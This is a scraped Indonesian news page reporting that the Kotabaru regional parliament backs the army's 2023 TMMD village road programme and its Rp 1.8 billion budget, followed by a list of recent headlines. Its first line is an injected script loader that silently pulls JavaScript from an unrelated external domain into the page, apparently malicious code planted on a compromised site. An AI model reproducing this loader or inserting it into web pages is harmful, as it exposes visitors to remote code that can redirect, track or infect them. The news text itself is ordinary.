(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD KOTABARU

DPRD Kotabaru Dukung Program TMMD Kodim 1004 Kotabaru


KANALKALIMANTAN.COM, KOTABARU – DPRD Kotabaru mendukung kegiatan Kodim 1004 Kotabaru pada Mei 2023 yang melaksanakan TMMD di Kecamatan Kelumpang Hilir Kabupaten Kotabaru dengan memprioritas membangun akses jalan dari Desa Plajau Baru menuju Desa Pulau Panci.

Dalam kesempatannya, berhadir Ketua DPRD Kotabaru Syairi Mukhlis yang sangat memberikan dukungan atas pelaksanaan kegiatan TMMD tersebut.

Dikatakan oleh Syairi Mukhlis bahwa, bentuk dukungan yang pihaknya berikan kepada Kodim 1004 Kotabaru dalam pelaksanaan TMMD pada 10 Mei di Kecamatan Kelumpang Hilir tersebut di legislatif sudah menyetujui anggaran di 2023 terkait pelaksanaan TMMD sebesar Rp 1,8 miliar, melalui anggaran APBD Kotabaru dan akses jalan yang akan dibangun sepanjang kurang lebih 2 kilometer.

“Kegiatan TMMD ini merupakan akselerasi percepatan pembangunan infrastruktur kita dan juga dalam rangka membamtu akselerasi pertumbuhan masyarakat yang ada di sana,” tutur Syairi, Rabu (3/5/23).

Baca juga: Momentum Hari Buruh, Ini Harapan Wakil Ketua Komisi II DPRD Kapuas

Dia mengatakan, disamping mendukung program TMMD pihaknya juga memberikan apresiasi yang setinggi-tingginya kepada Dandim 1004 Kotabaru beserta anggotanya.

“Yang jelas kami memberikan apresiasi kepada jajaran Kodim 1004 khususnya Dandim, yang telah melaksanakan program TMMD untuk membantuk masyarakat,” ucap dia.

Senada dengan itu, Dandim 1004 Kotabaru, Letkol Inf Boni Berdian mengatakan tahun 2023 sekarang TNI AD akan melaksanakan kegiatan pembangunan jalan di wilayah Kecamatan Kelumpang Hilir dari Desa Plajau Baru menuju Desa Pulau Panci.

“Untuk pelaksanaan TMMD-nya nanti akan kami mulai pada tanggal 10 Mei 2023,” ujar dia.

Baca juga: Operasi Patuh Intan 2023 Polres Banjar, Ini 12 Pelanggaran yang Bakal Ditilang

Kegiatan pembangunan jalan merupakan program TNI AD yang dinamakan dengan TNI Manunggal Membangun Desa (TTMD). Dulu dikenal dengan TNI Masuk Desa (TMD) bertemakan sinergitas lintas sektoral bersama Pemerintah Daerah untuk membangun desa.

“Dalam program TMMD tahun ini kita memperbagus jalan dari desa Plajau Baru menuju desa Pulau Panci yang panjangnya sekitar 2 kilometer, dengan anggaran Rp 1, 8 miliar,” katanya. (Kanalkalimantan.com/muhammad)

Reporter: muhammad
Editor: Dhani


Risa

Recent Posts

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

31 menit ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

14 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

14 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

14 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

15 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

15 jam ago

This website uses cookies.